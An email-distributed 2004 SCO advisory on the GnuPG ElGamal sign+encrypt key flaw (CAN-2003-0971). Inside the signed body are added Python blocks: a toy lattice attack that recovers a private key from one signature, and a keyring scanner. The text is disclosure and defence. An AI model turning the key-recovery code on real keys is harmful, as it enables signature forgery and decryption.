Date: Tue, 2 Mar 2004 18:57:01 -0800 (PST)
From: [email protected]
To: [email protected], [email protected],
Subject: OpenLinux: Gnupg (gpg) severe bug could compromise almost all ElGamal keys
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
______________________________________________________________________________
SCO Security Advisory
Subject: OpenLinux: Gnupg (gpg) severe bug could compromise almost all ElGamal keys
Advisory number: CSSA-2004-009.0
Issue date: 2004 March 02
Cross reference: sr888900 fz528657 erg712525 CAN-2003-0971
______________________________________________________________________________
1. Problem Description
GnuPG (GPG) 1.0.2, and other versions up to 1.2.3, generates ElGamal
sign+encrypt keys with a secret exponent far shorter than the modulus,
and signs with an equally short per-signature random value k. This
shortcut is safe for ElGamal encryption keys, where the key is never
exposed through a signature, but in the signature equation both unknowns
are then small, which allows an attacker to recover the private key from
a single signature by lattice reduction. ElGamal encrypt-only keys and
the default DSA signing keys are not affected.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CAN-2003-0971 to this issue.
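The attack behind this description, as an added worked example that is not GnuPG's code: ElGamal signing with a short secret exponent and a short per-signature value, followed by recovery of the private key from one signature with a four-dimensional LLL reduction. The modulus 2^89-1, the generator 3, the 30-bit secrets, the lattice weight C and the seed are all illustrative assumptions chosen so that it runs in pure Python; real GnuPG keys are 1024 bits or more, and the same lattice idea scales to those sizes.

```python
"""Toy reconstruction of the CAN-2003-0971 ElGamal signing-key flaw.

Added example, not GnuPG code. An ElGamal sign+encrypt key is generated
whose secret exponent x, and whose per-signature random value k, are both
far shorter than the modulus (the shortcut GnuPG used); one message is
signed, and x is recovered from that single signature by lattice
reduction. The 89-bit Mersenne prime, generator 3 and 30-bit secrets are
illustrative assumptions, not GnuPG's actual parameter sizes.
"""
import hashlib
import random
from fractions import Fraction
from math import gcd

P = 2**89 - 1      # assumed toy modulus (a Mersenne prime)
G = 3              # assumed generator (any element of large order works here)
N = P - 1          # exponents are reduced modulo p-1
SECRET_BITS = 30   # assumed toy "short" size used for both x and k: the flaw

def _short_exponent(rng, bits):
    """A bits-long secret coprime to p-1, so it is invertible when used as k."""
    while True:
        e = rng.getrandbits(bits) | (1 << (bits - 1))
        if gcd(e, N) == 1:
            return e

def digest(msg):
    return int.from_bytes(hashlib.sha256(msg).digest(), "big") % N

def keygen(rng, bits=SECRET_BITS):
    x = _short_exponent(rng, bits)
    return x, pow(G, x, P)                      # private x, public y = g^x

def sign(x, msg, rng, bits=SECRET_BITS):
    """Textbook ElGamal signature: a = g^k, b = (m - x*a) * k^-1 (mod p-1)."""
    m, k = digest(msg), _short_exponent(rng, bits)   # k is short as well
    a = pow(G, k, P)
    return a, (m - x * a) * pow(k, -1, N) % N

def verify(y, msg, sig):
    a, b = sig
    return 0 < a < P and pow(G, digest(msg), P) == pow(y, a, P) * pow(a, b, P) % P

def lll(basis, delta=Fraction(3, 4)):
    """Textbook LLL on integer row vectors with exact rational Gram-Schmidt,
    recomputed after every change; adequate for the 4x4 lattice used below."""
    b = [list(v) for v in basis]
    n = len(b)

    def dot(u, v):
        return sum(ui * vi for ui, vi in zip(u, v))

    def gram_schmidt():
        bstar, mu = [], [[Fraction(0)] * n for _ in range(n)]
        for i in range(n):
            v = [Fraction(c) for c in b[i]]
            for j in range(i):
                mu[i][j] = dot(b[i], bstar[j]) / dot(bstar[j], bstar[j])
                v = [vi - mu[i][j] * sj for vi, sj in zip(v, bstar[j])]
            bstar.append(v)
        return bstar, mu

    bstar, mu = gram_schmidt()
    k = 1
    while k < n:
        for j in range(k - 1, -1, -1):                    # size-reduce b[k]
            q = round(mu[k][j])
            if q:
                b[k] = [bk - q * bj for bk, bj in zip(b[k], b[j])]
                bstar, mu = gram_schmidt()
        if dot(bstar[k], bstar[k]) >= (delta - mu[k][k - 1] ** 2) * dot(bstar[k - 1], bstar[k - 1]):
            k += 1                                        # Lovasz condition holds
        else:
            b[k], b[k - 1] = b[k - 1], b[k]               # swap and step back
            bstar, mu = gram_schmidt()
            k = max(k - 1, 1)
    return b

def recover_private_key(y, msg, sig, bound_bits=SECRET_BITS):
    """Solve a*x + b*k = m (mod p-1) for short x and k from ONE signature.

    Every (u, v, w*K, C*(a*u + b*v - m*w + t*N)) is a lattice point; the
    solution (x, k, K, 0) is far shorter than any other, so LLL exposes it.
    Returns None when x is not short: a full-size key is not broken this way.
    """
    a, b = sig
    m = digest(msg)
    K = 1 << bound_bits   # expected magnitude of x and k
    C = 1 << 40           # heavy weight: forces the congruence to hold exactly
    basis = [[1, 0, 0, C * a], [0, 1, 0, C * b], [0, 0, K, -C * m], [0, 0, 0, C * N]]
    for v in lll(basis):
        if v[3] == 0 and abs(v[2]) == K:
            x = v[0] if v[2] > 0 else -v[0]
            if 0 < x < K and pow(G, x, P) == y:
                return x
    return None

def demo(secret_bits=SECRET_BITS, seed=2004, msg=b"constructed sample message"):
    """Returns (signature verifies, private key recovered from that signature)."""
    rng = random.Random(seed)
    x, y = keygen(rng, secret_bits)
    sig = sign(x, msg, rng, secret_bits)
    return verify(y, msg, sig), recover_private_key(y, msg, sig) == x

if __name__ == "__main__":
    print("short x and k (the flaw):", demo())                # (True, True)
    print("full-size x and k:       ", demo(secret_bits=88))  # (True, False)
```

The first line reports (True, True): the signature verifies and the private exponent was read straight out of that one signature. The second line, with 88-bit x and k against the same modulus, reports (True, False): the solution vector is no longer short, so the reduction finds nothing, which is exactly why the shortcut is harmless for encryption-only keys and fatal for signing keys.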
2. Vulnerable Supported Versions
System                          Package
----------------------------------------------------------------------
OpenLinux 3.1.1 Server          prior to gnupg-1.2.2-2.i386.rpm
OpenLinux 3.1.1 Workstation     prior to gnupg-1.2.2-2.i386.rpm
3. Solution
The proper solution is to install the latest packages. Many
customers find it easier to use the Caldera System Updater, called
cupdate (or kcupdate under the KDE environment), to update these
packages rather than downloading and installing them by hand.
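Updating the package stops new keys of this kind from being created, but it does not change a key that already exists in a keyring, and a key that has already produced a signature has to be treated as compromised. The following added check, which is not part of the advisory or of GnuPG, parses the machine-readable listing that `gpg --with-colons --list-keys` prints and reports every key or subkey whose public-key algorithm is 20 (ElGamal sign+encrypt); the sample listing is constructed and its key IDs are fictitious.

```python
"""Find ElGamal sign+encrypt keys (OpenPGP public-key algorithm 20) in a
keyring. Added example, not part of the advisory or of GnuPG; it parses the
machine-readable output of `gpg --with-colons --list-keys`. The listing
below is constructed for illustration and its key IDs are fictitious."""
import subprocess

ELGAMAL_SIGN_ENCRYPT = 20   # affected: the key type this advisory is about
ELGAMAL_ENCRYPT_ONLY = 16   # not affected
DSA = 17                    # not affected (the default signing key type)
KEY_RECORDS = {"pub", "sub", "sec", "ssb"}

# Constructed sample: a DSA key with an ElGamal encryption subkey (safe), an
# ElGamal sign+encrypt primary key, and a DSA key with an ElGamal sign+encrypt
# subkey (both affected). Field 3 is the size, field 4 the algorithm, field 5
# the key ID.
SAMPLE_LISTING = """\
pub:u:1024:17:0123456789ABCDEF:1040000000:::u:::scESC:
uid:u::::1040000000::0123456789ABCDEF0123456789ABCDEF01234567::Alice Example <alice@example.invalid>:
sub:u:2048:16:FEDCBA9876543210:1040000000:::::e:
pub:u:1024:20:1111222233334444:1050000000:::u:::scESC:
uid:u::::1050000000::FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF::Bob Example <bob@example.invalid>:
sub:u:1024:16:5555666677778888:1050000000:::::e:
pub:u:1024:17:99990000AAAABBBB:1060000000:::u:::scESC:
sub:u:1024:20:CCCCDDDDEEEEFFFF:1060000000:::::esa:
"""

def affected_keys(listing):
    """Return (record type, key ID, bits) for every key or subkey using algorithm 20."""
    found = []
    for line in listing.splitlines():
        fields = line.split(":")
        if len(fields) < 5 or fields[0] not in KEY_RECORDS:
            continue
        algo = int(fields[3]) if fields[3].isdigit() else None
        if algo == ELGAMAL_SIGN_ENCRYPT:
            bits = int(fields[2]) if fields[2].isdigit() else 0
            found.append((fields[0], fields[4], bits))
    return found

def scan_keyring(secret=False):
    """Run gpg on the local keyring and report affected keys. Secret keys are
    listed with --list-secret-keys, which uses the same colon format."""
    cmd = ["gpg", "--with-colons", "--list-secret-keys" if secret else "--list-keys"]
    out = subprocess.run(cmd, capture_output=True, text=True, check=True).stdout
    return affected_keys(out)

if __name__ == "__main__":
    for rec, keyid, bits in affected_keys(SAMPLE_LISTING):
        print(f"{rec} {keyid} ({bits}-bit ElGamal sign+encrypt): treat as compromised")
```

On the sample this reports the primary key 1111222233334444 and the subkey CCCCDDDDEEEEFFFF; the two algorithm-16 subkeys and the DSA primaries are left alone. Run scan_keyring() and scan_keyring(secret=True) against a real keyring after installing the update.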
4. OpenLinux 3.1.1 Server
4.1 Package Location
ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Server/CSSA-2004-009.0/RPMS
4.2 Packages
168ed23b56488785d45e861aaef4b3cc gnupg-1.2.2-2.i386.rpm
4.3 Installation
rpm -Fvh gnupg-1.2.2-2.i386.rpm
4.4 Source Package Location
ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Server/CSSA-2004-009.0/SRPMS
4.5 Source Packages
1713a8818339c43ecd988be7015ae677 gnupg-1.2.2-2.src.rpm
5. OpenLinux 3.1.1 Workstation
5.1 Package Location
ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Workstation/CSSA-2004-009.0/RPMS
5.2 Packages
90a18da7cdd7247cf601e8bbef66c1e7 gnupg-1.2.2-2.i386.rpm
5.3 Installation
rpm -Fvh gnupg-1.2.2-2.i386.rpm
5.4 Source Package Location
ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Workstation/CSSA-2004-009.0/SRPMS
5.5 Source Packages
2fad8d8f3cad20a62fac0e9eb39e283b gnupg-1.2.2-2.src.rpm
6. References
Specific references for this advisory:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0971
SCO security resources:
http://www.sco.com/support/security/index.html
This security fix closes SCO incidents sr888900 fz528657
erg712525.
7. Disclaimer
SCO is not responsible for the misuse of any of the information
we provide on this website and/or through our security
advisories. Our advisories are a service to our customers intended
to promote secure installation and use of SCO products.
8. Acknowledgements
SCO would like to thank Phong Nguyen
______________________________________________________________________________
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (SCO/UNIX_SVR5)
iD8DBQFARUhwbluZssSXDTERAjEkAKDo9I+3dH8mV+mcFxcm+Mf1UN3iNgCbB156
icQE3x3fX7Js8k2osQgRweM=
=hl26
-----END PGP SIGNATURE-----